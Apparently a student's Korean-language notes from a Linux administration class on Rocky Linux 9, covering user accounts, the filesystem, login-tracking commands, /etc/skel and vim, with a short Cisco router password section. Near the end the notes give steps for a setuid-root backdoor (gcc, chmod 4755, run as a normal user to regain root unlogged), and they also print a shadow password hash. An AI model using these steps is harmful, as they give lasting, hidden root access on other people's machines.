/etc/shadow:korea2:$6$rounds=100000$VPu.yPxmNU8mzcIJ$k7XeABJeJRN2NL1YHaKXHF7VJcSlCURdPjwiVVj69sVUUPLdpsOTtzK9x1FrE020jXhHOBPbTJx.gFVzfzITS.:20060:0:99999:7::20059:
[root@R91-01 ~]# usermod -e 2024/12/04 korea2
[root@R91-01 ~]# grep korea2 /etc/passwd /etc/shadow
/etc/passwd:korea2:x:1018:1018::/home/korea2:/bin/bash
/etc/shadow:korea2:$6$rounds=100000$VPu.yPxmNU8mzcIJ$k7XeABJeJRN2NL1YHaKXHF7VJcSlCURdPjwiVVj69sVUUPLdpsOTtzK9x1FrE020jXhHOBPbTJx.gFVzfzITS.:20060:0:99999:7::20061:
게임 계정이 오늘 만료날인데 계속 쓰는방법? 서버 안나가면 되는데
게임정기점검하는거-->그런 회원들 짜르는거임
--------------------------------------------------------------------------------
-c 는 주석이라 생각하면됨 passwd랑 상관있음
:으로 하나씩 하나씩 구분함 엑셀 행 생각하면됨\
korea2:x:1018:1018::/home/korea2:/bin/bash
필드가 총 7개라 생각하면됨
x는 암호화해서 shadow로 넘긴다는거임
로키9인 1000번부터 계정을 생성하면서 번호 추가
1018번이라는건 로키9에서 18번째 만든 계쩡
1018번은 그룹 아이디임
korea2는 가짜이름
1018::1018이 민증번호라 생각하면됨 진짜 이름!
5번째 비어있는건 총무부 김대리같은 (총무부부서이름넣는데 우린 없어서 비어있는거임)
/home/korea2위치
/bin/bash 로그인 필드 셀
[root@R91-01 ~]# grep korea2 /etc/passwd
korea2:x:1018:1018::/home/korea2:/bin/bash
[root@R91-01 ~]# usermod -c kim korea2
[root@R91-01 ~]# grep korea2 /etc/passwd
korea2:x:1018:1018:kim:/home/korea2:/bin/bash
만약 kim지우고싶어요
요러면 지울수 있져~~
참고로 ''안하고 비워두면 오류뜹니당~
[root@R91-01 ~]# usermod -c '' korea2
[root@R91-01 ~]# grep korea2 /etc/passwd
korea2:x:1018:1018::/home/korea2:/bin/bash
리눅스에서 제일 꼭대기 cd /
ls
[root@R91-01 ~]# cd /
[root@R91-01 /]# ls
afs boot etc lib media opt root sbin sys usr
bin dev home lib64 mnt proc run srv tmp var
1. boot는 부팅할때 쓰는 파일들이 들어가있음
2. etc 환경설정파일들(제일 중요)-->root만 들어갈 수 있음/그래서 etc/shadow파일이 여기에 들어가있는거임
3. root root홈디렉토리임. 루트가 시작하는 계정 디렉토리. 루트로 로그인하면 저기서 시작하는거임
4. home은 user홈디렉토리임. user들이 시작하는 계쩡 디렉토리/root랑 user랑 시작 디렉토리가 달라요
5. dev 하드웨어 정보가 들어가있음
6. bin [binary] 유저도 사용할 수 있는 명령어가 들어가 있는 디텍토리
7.sbin [specialbinary] 루트만 사용할 수 있는 명령어가 들어가 있는 디렉토리
useradd는 대표적으로 sbin에 들어가있음 why? root만 계정 생성가능하거든
8. proc[process] cpu정보 확인하는거임
9. usr var
c드라이브밑에 프로그램 파일들[윈도우운영체제에서 사용자가 프로그램을 설치하면
c드라이브에 설치되는데 그게 리눅스에서 usr이랑 var임]
usr 은 정적 데이터
var 은 동적 데이터
예를 들어) mail은 동적 데이터임. 맨날 다른 메일 받으니까. 정적이 아니라 동적임
log도 그때그때 다르니까 동적 데이터임. 그래서 mail이랑 log도 var로 들어가는거임
4번터미널에서 user11로 로그인하고
cd
pwd
/home/user11
cd /home/suer1 하면 permission denied 내 땅아니라 거부당함
남에 땅에들어가는 방법 딱 하나 걔가 날 초대해줘야함
근데 누가 내땅 허락도 안했는데 들어왔다? 100%해킹임
root
cd
pwd
/root
mkdir 1203
cd 1203
ls
ls -a
. ..라고뜸 아무것도 없다고
mkdir dri1 .dri2 dri3 .dri4 dri5 .dri6
홀수번호는 보이고
짝수번호는 안보임
.넣으면 폴더숨기는 옵션임
[root@R91-01 1203]# mkdir dri1 .dri2 dri3 .dri4 dri5 .dri6
[root@R91-01 1203]# ls
dri1 dri3 dri5
[root@R91-01 1203]# ls -a
. .. .dri2 .dri4 .dri6 dri1 dri3 dri5
[root@R91-01 1203]# cd .dri2
[root@R91-01 .dri2]# pwd
/root/1203/.dri2
그래서 pwd로 항상 위치 확인해야함
파일 만드는건 touch임
폴더는 mkdir
[root@R91-01 .dri2]# pwd
/root/1203/.dri2
[root@R91-01 .dri2]# touch .file1 file2 .file3 file4 .file5 file6
[root@R91-01 .dri2]# ls
file2 file4 file6
[root@R91-01 .dri2]# ls -a
. .. .file1 .file3 .file5 file2 file4 file6
[root@R91-01 .dri2]#
여기서 이제 root폴더로 가고싶다? cd
만약 한칸 뒤로 가고싶다? cd ..
[root@R91-01 .dri2]# cd ..
[root@R91-01 1203]# pwd
/root/1203
폴더를 지우고 싶다? rmdir
[root@R91-01 1203]# ls -a
. .. .dri2 .dri4 .dri6 dri1 dri3 dri5
[root@R91-01 1203]# rmdir .dri4
[root@R91-01 1203]# ls -a
. .. .dri2 .dri6 dri1 dri3 dri5
[root@R91-01 1203]# rmdir dri1 dri3 dri5
[root@R91-01 1203]# ls -a
. .. .dri2 .dri6
[root@R91-01 1203]#
[root@R91-01 1203]# rmdir .dri6
[root@R91-01 1203]# ls -a
. .. .dri2
[root@R91-01 1203]# rmdir .dri2
rmdir: failed to remove '.dri2': 디렉터리가 비어있지 않음
[root@R91-01 1203]#
실천에서는 rmdir을 안씀 왜? 방금 위에 받듯이 안에 내용물이 있으면 명령어를 작동안하니까
번거로우니까. 가용성이 떨어짐. 이런게 있긴함 ㅇㅇ
폴더랑 파일 지우는 명령어 rm
이러면 한번더 물어봄 너 진짜 지울꺼양? yes해야 지워짐
그래서 rm -f하면 force 강제로 ㅋㅋ지움 yes 칠 필요없어짐
-r, -R, --recursive
remove directories and their contents recursively
-r은 폴더 지울때만 하는거임 안에 내용물있어도 상관없음 그래서 rm -rf
mkdir -p
하면 부모 자식 동시에 만드는거임
mkdir -p a/b/c/d/e/f/g/f
하면 챠라라락 가능
아니면 cd로 들어가서 일일히 만들어줘야함
dnf install -y tree는 이 만든걸 확인해주는 명령어임
[root@R91-01 1203]# dnf install -y tree
Rocky Linux 9 - BaseOS 6.7 kB/s | 4.1 kB 00:00
Rocky Linux 9 - AppStream 7.7 kB/s | 4.5 kB 00:00
Rocky Linux 9 - Extras 4.8 kB/s | 2.9 kB 00:00
꾸러미 tree-1.8.0-10.el9.x86_64가 이미 설치되어 있습니다.
종속성이 해결되었습니다.
처리가 필요하지 않습니다.
완료되었습니다!
[root@R91-01 1203]# mkdir -p a/b/c/d/e/f/g/f
[root@R91-01 1203]# tree
.
└── a
└── b
└── c
└── d
└── e
└── f
└── g
└── f
8 directories, 0 files
[root@R91-01 1203]# ls -a
. .. .dri2 a
[root@R91-01 1203]# rm -rf a
[root@R91-01 1203]# ls -a
. .. .dri2
[root@R91-01 1203]# mkdir -p happy/h/a/p/p/y
[root@R91-01 1203]# ls -a
. .. .dri2 happy
[root@R91-01 1203]# tree happy
happy
└── h
└── a
└── p
└── p
└── y
----------------------------------------------------------------------------------
cd /home
cd korea2
ls -a
ls -a /home/user0
차이
.bash_history 로그인 로그아웃해서 뭐했는지 히스토리 파일임
[root@R91-01 happy]# cd /home
[root@R91-01 home]# cd korea2
[root@R91-01 korea2]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
로그인했는지 없는지 모름 왜? 로그인 되어있으니까
[root@R91-01 korea2]# ls -a /home/user0
. .bash_logout .cache .mozilla 공개 바탕화면 서식
.. .bash_profile .config .ssh 다운로드 비디오 음악
.bash_history .bashrc .local .viminfo 문서 사진
[root@R91-01 korea2]# last
user11 tty4 Tue Dec 3 10:00 still logged in
korea2 tty5 Tue Dec 3 09:48 still logged in
root tty2 tty2 Tue Dec 3 09:47 still logged in
root seat0 login screen Tue Dec 3 09:47 still logged in
last는 로그인 기록임
lastlog는 뭐냐? etc밑에 passwd밑에 계정들이 로그인했는지 안했는지 볼 수 있음
한번도 로그인한적없습니다는 한번도 로그인한게 아님
**한번도 로그인한 적이 없습니다**
korea2 tty5 화 12월 3 09:48:09 +0900 2024
korea2로 로그인 하지않았다는거임
근데 만약 한번도 로그인하지않았는데 흔적이 있다? 아 해킹이죠
w who users last lastlog
이 다섯개로 로그인 기록을 확인 및 추적할 수 있음
[root@R91-01 korea2]# w
10:36:35 up 49 min, 4 users, load average: 0.01, 0.00, 0.00
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root seat0 09:47 0.00s 0.00s 0.00s /usr/libexec/gdm-wayland-sessio
root tty2 09:47 49:24 0.01s 0.01s /usr/libexec/gnome-session-bina
korea2 tty5 09:48 48:27 0.00s 0.00s -bash
user11 tty4 10:00 33:55 0.04s 0.04s -bash
[root@R91-01 korea2]# who
root seat0 2024-12-03 09:47 (login screen)
root tty2 2024-12-03 09:47 (tty2)
korea2 tty5 2024-12-03 09:48
user11 tty4 2024-12-03 10:00
[root@R91-01 korea2]# users
korea2 root root user11
[root@R91-01 korea2]# last
user11 tty4 Tue Dec 3 10:00 still logged in
korea2 tty5 Tue Dec 3 09:48 still logged in
root tty2 tty2 Tue Dec 3 09:47 still logged in
root seat0 login screen Tue Dec 3 09:47 still logged in
reboot system boot 5.14.0-503.15.1. Tue Dec 3 09:47 still running
root tty2 tty2 Tue Dec 3 09:31 - down (00:15)
root seat0 login screen Tue Dec 3 09:31 - down (00:15)
reboot system boot 5.14.0-503.15.1. Tue Dec 3 09:31 - 09:46 (00:15)
user6 pts/0 ::ffff:192.168.1 Mon Dec 2 13:50 - 13:50 (00:00)
user0 pts/0 ::ffff:192.168.1 Mon Dec 2 11:38 - 11:38 (00:00)
root pts/0 192.168.10.250 Mon Dec 2 11:14 - 11:15 (00:00)
root pts/0 192.168.10.241 Mon Dec 2 10:54 - 10:55 (00:00)
root tty2 tty2 Mon Dec 2 10:54 - crash (22:36)
root seat0 login screen Mon Dec 2 10:54 - crash (22:36)
reboot system boot 5.14.0-427.13.1. Mon Dec 2 10:54 - 09:46 (22:52)
user0 tty2 tty2 Fri Nov 29 09:31 - crash (3+01:22)
user0 seat0 login screen Fri Nov 29 09:31 - crash (3+01:22)
reboot system boot 5.14.0-427.13.1. Fri Nov 29 09:31 - 09:46 (4+00:15)
user0 tty2 tty2 Thu Nov 28 17:39 - crash (15:52)
user0 seat0 login screen Thu Nov 28 17:39 - crash (15:52)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 17:38 - 09:46 (4+16:07)
user0 tty2 tty2 Thu Nov 28 17:35 - crash (00:03)
user0 seat0 login screen Thu Nov 28 17:35 - crash (00:03)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 17:35 - 09:46 (4+16:11)
user0 tty2 tty2 Thu Nov 28 17:31 - crash (00:04)
user0 seat0 login screen Thu Nov 28 17:31 - crash (00:04)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 17:31 - 09:46 (4+16:15)
user0 tty2 tty2 Thu Nov 28 17:20 - crash (00:10)
user0 seat0 login screen Thu Nov 28 17:20 - crash (00:10)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 17:20 - 09:46 (4+16:26)
root tty2 tty2 Thu Nov 28 09:33 - crash (07:46)
root seat0 login screen Thu Nov 28 09:33 - crash (07:46)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 09:24 - 09:46 (5+00:22)
root pts/2 192.168.10.44 Wed Nov 27 13:13 - crash (20:10)
root pts/2 192.168.10.31 Wed Nov 27 13:07 - 13:10 (00:02)
root pts/4 192.168.10.36 Wed Nov 27 13:00 - 13:10 (00:10)
root pts/3 192.168.10.36 Wed Nov 27 12:58 - 13:10 (00:12)
root pts/2 192.168.10.35 Wed Nov 27 12:54 - 13:05 (00:10)
root pts/2 192.168.10.35 Wed Nov 27 12:53 - 12:54 (00:00)
root pts/6 192.168.10.45 Wed Nov 27 12:51 - 12:51 (00:00)
root pts/4 192.168.10.45 Wed Nov 27 12:50 - 12:51 (00:00)
root pts/3 192.168.10.39 Wed Nov 27 12:50 - 12:51 (00:01)
root pts/2 192.168.10.39 Wed Nov 27 12:49 - 12:52 (00:02)
root pts/5 192.168.10.32 Wed Nov 27 12:48 - crash (20:35)
root pts/4 192.168.10.125 Wed Nov 27 12:48 - 12:48 (00:00)
root pts/3 192.168.10.39 Wed Nov 27 12:48 - 12:49 (00:01)
root pts/2 192.168.10.32 Wed Nov 27 12:48 - 12:49 (00:01)
root tty2 tty2 Wed Nov 27 12:47 - crash (20:36)
root seat0 login screen Wed Nov 27 12:47 - crash (20:36)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:47 - 09:46 (5+20:59)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:46 - 12:47 (00:00)
root pts/1 192.168.10.32 Wed Nov 27 12:45 - 12:45 (00:00)
root pts/4 192.168.10.125 Wed Nov 27 12:44 - 12:45 (00:01)
user0 pts/1 192.168.10.47 Wed Nov 27 12:43 - 12:44 (00:01)
root pts/3 192.168.10.47 Wed Nov 27 12:42 - 12:45 (00:02)
root tty2 tty2 Wed Nov 27 12:41 - down (00:04)
root seat0 login screen Wed Nov 27 12:41 - down (00:04)
root pts/0 192.168.10.125 Wed Nov 27 12:41 - 12:45 (00:04)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:41 - 12:45 (00:04)
root pts/4 192.168.10.42 Wed Nov 27 12:40 - 12:40 (00:00)
user0 tty3 Wed Nov 27 12:38 - down (00:02)
root pts/2 192.168.10.125 Wed Nov 27 12:37 - 12:40 (00:03)
root pts/2 192.168.10.125 Wed Nov 27 12:35 - 12:36 (00:00)
root pts/3 192.168.10.125 Wed Nov 27 12:32 - 12:40 (00:08)
root pts/2 192.168.10.33 Wed Nov 27 12:31 - 12:32 (00:00)
root tty2 tty2 Wed Nov 27 12:05 - down (00:35)
root seat0 login screen Wed Nov 27 12:05 - down (00:35)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:05 - 12:40 (00:35)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:04 - 12:05 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:02 - 12:03 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:02 - 12:02 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 11:59 - 11:59 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 11:53 - 11:54 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 11:53 - 11:53 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 11:20 - 11:41 (00:20)
root pts/2 192.168.10.33 Wed Nov 27 11:13 - 11:20 (00:06)
root pts/1 192.168.10.125 Wed Nov 27 11:13 - 11:14 (00:00)
root tty2 tty2 Wed Nov 27 10:26 - down (00:53)
root seat0 login screen Wed Nov 27 10:26 - down (00:53)
root pts/3 192.168.10.125 Wed Nov 27 09:55 - 09:56 (00:01)
user0 tty7 tty7 Wed Nov 27 09:53 - down (01:27)
user0 seat0 login screen Wed Nov 27 09:53 - 10:26 (00:33)
user3 pts/0 192.168.10.33 Wed Nov 27 09:49 - 10:20 (00:30)
user9 pts/3 192.168.10.39 Wed Nov 27 09:46 - 09:49 (00:03)
user0 pts/0 192.168.10.33 Wed Nov 27 09:44 - 09:47 (00:02)
user0 pts/3 192.168.10.33 Wed Nov 27 09:42 - 09:45 (00:02)
root pts/0 192.168.10.125 Wed Nov 27 09:41 - 09:43 (00:01)
user0 tty3 Wed Nov 27 09:41 - down (01:39)
user1 pts/0 192.168.10.125 Wed Nov 27 09:40 - 09:41 (00:00)
user1 tty5 tty5 Wed Nov 27 09:40 - 10:20 (00:40)
user1 seat0 login screen Wed Nov 27 09:40 - 09:53 (00:13)
user0 pts/0 192.168.10.32 Wed Nov 27 09:39 - 09:40 (00:00)
user0 pts/0 192.168.10.78 Tue Nov 26 13:17 - 13:23 (00:06)
root tty3 Tue Nov 26 13:04 - 09:41 (20:37)
root pts/1 192.168.10.125 Tue Nov 26 12:56 - 13:02 (00:05)
user0 pts/2 192.168.10.32 Tue Nov 26 12:49 - 12:54 (00:05)
root pts/1 192.168.10.125 Tue Nov 26 12:49 - 12:55 (00:06)
user0 pts/1 192.168.10.32 Tue Nov 26 12:32 - 12:40 (00:07)
root tty4 Tue Nov 26 12:15 - down (23:05)
user0 tty3 Tue Nov 26 12:13 - 12:54 (00:41)
root tty2 tty2 Tue Nov 26 11:19 - 10:26 (23:06)
root seat0 login screen Tue Nov 26 11:19 - 09:40 (22:20)
reboot system boot 5.14.0-427.13.1. Tue Nov 26 11:12 - 11:20 (1+00:07)
wtmp begins Tue Nov 26 11:12:51 2024
[root@R91-01 korea2]# laslog
bash: laslog: 명령을 찾을 수 없습니다...
[root@R91-01 korea2]# lastlog
Username Port From Latest
root pts/0 화 12월 3 10:02:57 +0900 2024
bin **한번도 로그인한 적이 없습니다**
daemon **한번도 로그인한 적이 없습니다**
adm **한번도 로그인한 적이 없습니다**
lp **한번도 로그인한 적이 없습니다**
sync **한번도 로그인한 적이 없습니다**
shutdown **한번도 로그인한 적이 없습니다**
halt **한번도 로그인한 적이 없습니다**
mail **한번도 로그인한 적이 없습니다**
operator **한번도 로그인한 적이 없습니다**
games **한번도 로그인한 적이 없습니다**
ftp **한번도 로그인한 적이 없습니다**
nobody **한번도 로그인한 적이 없습니다**
systemd-coredump **한번도 로그인한 적이 없습니다**
dbus **한번도 로그인한 적이 없습니다**
polkitd **한번도 로그인한 적이 없습니다**
avahi **한번도 로그인한 적이 없습니다**
rtkit **한번도 로그인한 적이 없습니다**
pipewire **한번도 로그인한 적이 없습니다**
sssd **한번도 로그인한 적이 없습니다**
libstoragemgmt **한번도 로그인한 적이 없습니다**
tss **한번도 로그인한 적이 없습니다**
geoclue **한번도 로그인한 적이 없습니다**
cockpit-ws **한번도 로그인한 적이 없습니다**
cockpit-wsinstance **한번도 로그인한 적이 없습니다**
flatpak **한번도 로그인한 적이 없습니다**
colord **한번도 로그인한 적이 없습니다**
clevis **한번도 로그인한 적이 없습니다**
setroubleshoot **한번도 로그인한 적이 없습니다**
gdm tty1 화 12월 3 09:47:13 +0900 2024
pesign **한번도 로그인한 적이 없습니다**
gnome-initial-setup **한번도 로그인한 적이 없습니다**
sshd **한번도 로그인한 적이 없습니다**
chrony **한번도 로그인한 적이 없습니다**
dnsmasq **한번도 로그인한 적이 없습니다**
tcpdump **한번도 로그인한 적이 없습니다**
user0 pts/0 ::ffff:192.168.10.56 월 12월 2 11:38:15 +0900 2024
user1 pts/0 목 11월 28 17:43:13 +0900 2024
user2 **한번도 로그인한 적이 없습니다**
user3 **한번도 로그인한 적이 없습니다**
user4 **한번도 로그인한 적이 없습니다**
user5 **한번도 로그인한 적이 없습니다**
user6 pts/0 ::ffff:192.168.10.36 월 12월 2 13:50:30 +0900 2024
user7 pts/0 수 11월 27 13:14:44 +0900 2024
user8 **한번도 로그인한 적이 없습니다**
user9 **한번도 로그인한 적이 없습니다**
user10 **한번도 로그인한 적이 없습니다**
user11 pts/0 화 12월 3 10:02:24 +0900 2024
user12 **한번도 로그인한 적이 없습니다**
user13 **한번도 로그인한 적이 없습니다**
user14 **한번도 로그인한 적이 없습니다**
user15 **한번도 로그인한 적이 없습니다**
user16 **한번도 로그인한 적이 없습니다**
user17 **한번도 로그인한 적이 없습니다**
stapunpriv **한번도 로그인한 적이 없습니다**
korea2 tty5 화 12월 3 09:48:09 +0900 2024
[root@R91-01 korea2]# -----
--------------------------------------------------------------------------------------------------
useradd korea4
passwd korea4
123456 123456
ls -a /home/korea4
. .. .bash_logout .bash_profile .bashrc .mozilla
skel은 복사하는거임 계정 정보들
.bash_logout 로그아웃후 실행할 것
.bash_profile 로그인 전에 실행할 것
.bashrc 로그인 후 실행할 것
.mozilla 인터넷 기록이랑 관련된거
계정 만들면 알아서 얘네들이 생성됨
이게 무슨뜻이냐
[root@R91-01 korea3]# cd /etc/skel
[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 skel]# mkdir test
[root@R91-01 skel]# cat > 1.txt
linux[root@R91-01 skel]#
cat > 1.txt 한다음 ctrl + d 하면 작성완료후 저장 후 끄기
만들어놓은 계정에 적용되고
이후 만든것들은 계정에 적용안됨
skel파일을 역할은 업무랑 관련된 파일이 있으면 넣어두고
꼭 skel 파일을 안쓰고 작업폴더가 있으면 그걸 usermod옵션으로
바꿔서 써도됨
skel은 -k 옵션임 -k 하고[폴더지정]하면 다한번에 복사가됨
편리 편리
skel 계정생성할때, 바로 시작하자마자 가지고있어라 그런 기본 옵션들 가지고 있는 파일
[root@R91-01 korea2]# useradd korea3
[root@R91-01 korea2]# passwd korea3
korea3 사용자의 비밀 번호 변경 중
새 암호:
새 암호 재입력:
passwd: 모든 인증 토큰이 성공적으로 업데이트 되었습니다.
[root@R91-01 korea2]#
[root@R91-01 korea2]# cd /home/korea3
[root@R91-01 korea3]# ls
[root@R91-01 korea3]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 korea3]# useradd korea4
[root@R91-01 korea3]# passwd korea4
korea4 사용자의 비밀 번호 변경 중
새 암호:
새 암호 재입력:
죄송합니다. 암호가 일치하지 않습니다.
passwd: 인증 토근 수정 오류
[root@R91-01 korea3]#
[root@R91-01 korea3]# passwd korea4
korea4 사용자의 비밀 번호 변경 중
새 암호:
새 암호 재입력:
passwd: 모든 인증 토큰이 성공적으로 업데이트 되었습니다.
[root@R91-01 korea3]# ls
[root@R91-01 korea3]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 korea3]# ls -a /home/korea4
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 korea3]# cd /etc/skel
[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 skel]# mkdir test
[root@R91-01 skel]# cat > 1.txt
linux[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla 1.txt test
[root@R91-01 skel]# cd /home/korea3
[root@R91-01 korea3]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 korea3]# ls -a /etc/skel
. .. .bash_logout .bash_profile .bashrc .mozilla 1.txt test
[root@R91-01 korea3]# useradd korea6
[root@R91-01 korea3]# ls -a /home/korea6
. .. .bash_logout .bash_profile .bashrc .mozilla 1.txt test
korea4랑 korea3는 이미 생성된거고 이후 skel에서 mkdir test 파일이랑 디렉토리 만듬
그리고 나서 보니까 skel에 생성되어있음
korea3랑 korea4에는 cd /home/korea3보면 test가 없음!
korea6새로 생성 후 ls -a /home/korea6하면 test가 있음! 왜? skel에서 세팅을 한 후
그 세팅이 새로 생긴 계정 korea6에 반영되었기때문
-------------------------------------------------------------------------------------
[root@R91-01 korea3]# pwd
/home/korea3
[root@R91-01 korea3]# cd /etc/skel
[root@R91-01 skel]# pwd
/etc/skel
[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla 1.txt test
[root@R91-01 skel]# rm -rf test 1.txt
[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
지우깅~text 1.txt 파일 필요없으니까 rm -rf 명령어 force remove
만약 -r을 안붙이고 지웠어! 그러면 똑같은 계정 만들고 다시 -r붙이고 지워두면됨
그 계정안에 정보가 그대로 있을테니까
nano를 써도되는데 vim이 편해요 ㅎㅎ
이제 vi대신에 vim을 쓰면됩니다
vim /etc/default/useradd
메모장 파일 여는거임
6개 키
우린 소문자 i 기억하기
i누르면 수정모드 들어감 끼워넣기라는게 생김i가 수정하겠다는거임
esc이후 누르면 입력모드가 사라짐 이러면 수정을 못함!!
VIM종료는 반드시 명령모드에서 할 수 있음
shift 콜론하고 q! 저장후 종료는 wq! !는 강제 종료
뭔가 에러가있엇허 잘 안되면 ! 붙이는거임
#useradd defaults file
GROUP=100
HOME=/home
INACTIVE=-1
EXPIRE=
SHELL=/bin/bash
SKEL=/etc/skel
CREATE_MAIL_SPOOL=yes
home은 디렉토리 설정
inactive=-1뜻은
사용자의 비활성 상태(로그인 비활성화)로 전환되기 전까지 비밀번호가 만료된 후 허용되는 일수를 지정합니다.
기본값:
-1은 비활성화 기간을 설정하지 않음을 의미합니다.
예시:
양수 값으로 설정하면 비밀번호가 만료된 후 사용자가 해당 기간 동안 새 비밀번호를 설정하지 않으면 계정이 비활성화됩니다.
expire은 만료일 [30쓰면 30일쓰는거임]
shell 바이너리밑에 bash쓰는거임. 리눅스는 대소문자 구분합니다
shell이 한 50개있다고요 그래서 /bin/bash셀이 가장 무난한 셀이에요
skell폴더는 /etc/skel에서 복사해왕
creat_mail_spool 메일 관련 만들꺼라는 뜻
명령모드에서 가능함
여긴 ctrl z가 없음 대신에 u누르면 됨
dd는 한줄 지우기
esc !qa강제저장
지금부터 작업할때는 무조건 백업파일 복사해놓고하기
그럼 걱정이 없음. 현장나가서도 마찬가지
그래서 작업하다가 문제생기면 돌려서하기
항상 작업하라고하면 pwd해서 /root하고 거기서 오늘 작업한 폴더만들고
거기서 작업하면 거기 기록되어있음 매일매일 그렇게 하기
[root@R91-01 skel]# cd
[root@R91-01 ~]# cd 1203
[root@R91-01 1203]# pwd
/root/1203
[root@R91-01 1203]# ls
happy
[root@R91-01 1203]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
root는 0번이에요. 루트이외에 0번 가지고있으면 다 해킹이라는뜻
3번자기계정으로 로그인user1
id
하면
uid=1001(user1)...쭉쭉 나옴
passwd명령
항상 옆사람한테 ssh들어갈땐 터미널로 들어가는거임 루트가아니라
ssh 192.168.10.32 해되 되고 그때 스크립트 해놓은걸로 ssh choi해도 됨
만약 w 해서 확인했는데 해킹 계정이있어 그럼 lock 걸어야함
passwd [옵션] [사용자계정]
-l 락하는거
-u 하면 언락하는거임
passwd -l user3 하면 유진씨가 못들어감
만약 해킹 계정 들어왔는데 절!대! 계정 삭제하면 안되고 일단 락 걸어두고
계정 로그나 히스토리 확인해야함
그리고 만약에 내가 만약에 어라 해킹 계정아니었네;;ㅈㅅㅎㅎ;;언락해줌 ㅎㅎ
------------------------------------------------------------------------------
dnf install -y gcc
만약 내가 우연히 관리자 번호를 알았어.
그래서 ssh로 옆친구 루트 계정으로 들어갔어
그래서 거기서 이제 해킹을 시작할꺼야
이후 cd /home/user1 들어가기
id 하면 root로 뜰거임
whoami하면 내가 누군지 뜸 ㅎㅎroot! 귀엽다(여기 서버에서 루트라는거임)
who am i라고 하면? root pts/1 2024-120- 11:00(192.168.10.31)으로 뜸(진짜나임)_
pwm
vim backdoor.c하고 i누르고 쓰기
해킹코드 쓸거임
shift 콜론 누르고 wr하고 나오기
ls -a 하면 빨갛게 나오고 튀어
하고 user로 로그인하고 ./backdoor치면 난 관리자가되는거임
이건 로그파일에 안잡힘 ㄷㄷ
dnf install -y gcc
cd /home/user0
vim gedit backdoor.c
gcc -o backdoor backdoor.c
chmod 4755 backdoor
이후 ssh 192.168.10.32 user1로 로그인 후
거기서 ls -a 해서 backdoor파일 확인후
./backdoor하면 관리자권한 탈취 가능
로그에도 안잡힘
이제 친구가 아무리 root자기 계정 비번 바꿔도
난 유저로 거기 들어가서 ./backdoor하면 관리자 권한 언제든지먹을수있음
그래서 이건 '우연히' 관리자계정을 얻어야하는거임
참고로
현실에서는 이거 만들면 바로 걸리고, ROOT패스워드 절대 못뚫음 ㅋㅋ
만약 뚫였다? 아 역시 사람이 문제다~
--------------------------------------------------------------------------------
오후 12:12 2024-12-03 네트워크 수업
라우터 암호에 6개 걸 수 있다해쬬?
1. 라우터 관리자 암호 2개
2. 모뎀 암호
3. 콘솔 암호
4. 원격 암호
5. 모든 설정된 암호화 이후로 설정되는 패스워드의 암호화 작업
명령어를 놓고보면
R1
conf t
enable password cisco
end
copy run start
show running-config
이렇게 하면 sh running-config하면
enable password cisco라고 보임
conft
service password-encryption
하면 5번임
sh running-config하면 이제 안보임
enable password 7 094F471A1A0A
만든 모든것들이 다 암호화됨
설정된 모든 암호와 앞으로 설정할 모든 암호들이 자동으로 암호화된다
no service password-encryption하면 다 암호화 풀림이 아님.ㄷㄷ
암호화된건 그대로 남겨져있넹
현장에서는 무조건 해야함 근데 우리는 실습해야해서 안해야함. 복호화 절대 못함 ㅋ
--------------------------------------------------------------------------------
conf t
hostname SEOUL
이름 바꾸기
라우터랑 스위치랑 다른점
스위치는 장비들이 연결되면 즉시 사용가능하도록 모든 포트들이 활성화되어있다.
그래서 선만 바로 가따꽂으면 바로 연결 굳/ 내부에서 쓰니까 맨날 활성화~~
라우터는 인터넷과 연결되는 장비이므로, 해킹 방지를 위하여 모든 포트들이 비활성화되어있음
int e0/0
ip add 192.168.10.4
no sh
show ip interface brief
내꺼 포트가 다 보여용~~ unassigned-->할당 안됐다는거임
SEOUL# sh ip int br
Interface IP-Address OK? Method Status Protocol
Ethernet0/0 unassigned YES NVRAM administratively down down
Ethernet0/1 unassigned YES NVRAM administratively down down
Ethernet0/2 unassigned YES NVRAM administratively down down
Ethernet0/3 unassigned YES NVRAM administratively down down
Ethernet1/0 unassigned YES NVRAM administratively down down
Ethernet1/1 unassigned YES NVRAM administratively down down
Ethernet1/2 unassigned YES NVRAM administratively down down
Ethernet1/3 unassigned YES NVRAM administratively down down
Serial2/0 172.16.12.1 YES NVRAM up up
Serial2/1 unassigned YES NVRAM administratively down down
Serial2/2 unassigned YES NVRAM administratively down down
지금 나와있는 유선들 종류
Etnernet 1-10Mbps 약 10만개
FastEthernet(광랜) 10-100Mbps
GigabitEthernet 100-1000Mbps
10GigabitEthernet 1000-10000Mbps
예를 들어 10GigabitEthernet 1000-10000Mbps 이건 다운보다 스트리밍이 더 빠름 ㅋㅋ
